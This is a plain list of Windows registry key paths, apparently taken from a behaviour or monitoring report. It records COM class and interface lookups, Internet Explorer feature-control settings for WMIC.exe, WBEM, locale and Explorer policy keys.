HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\file\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CLASSES_ROOT\.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xml\Content Type
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}
HKEY_CURRENT_USER\Software\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F2688ABE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\GipActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Classes\Interface\{79EAC9E4-BAF9-11CE-8C82-00AA004BA90B}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{79EAC9E4-BAF9-11CE-8C82-00AA004BA90B}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{79EAC9E4-BAF9-11CE-8C82-00AA004BA90B}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{79EAC9E4-BAF9-11CE-8C82-00AA004BA90B}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}
HKEY_CURRENT_USER\Software\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_CURRENT_USER\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
读取的注册表键
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\PageAllocatorUseSystemHeap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\PageAllocatorSystemHeapIsPrivate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a3-1bd9-11e5-9838806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{372941a4-1bd9-11e5-9838806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-42439432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D79371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D098A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a789c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c869454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B0FBD52D-C4A7-4a19985D-11309D1AC8AE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428dA78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1bcbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f954e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-487083b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-435088B0-7367FC96EF3C}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\WantsParseDisplayName
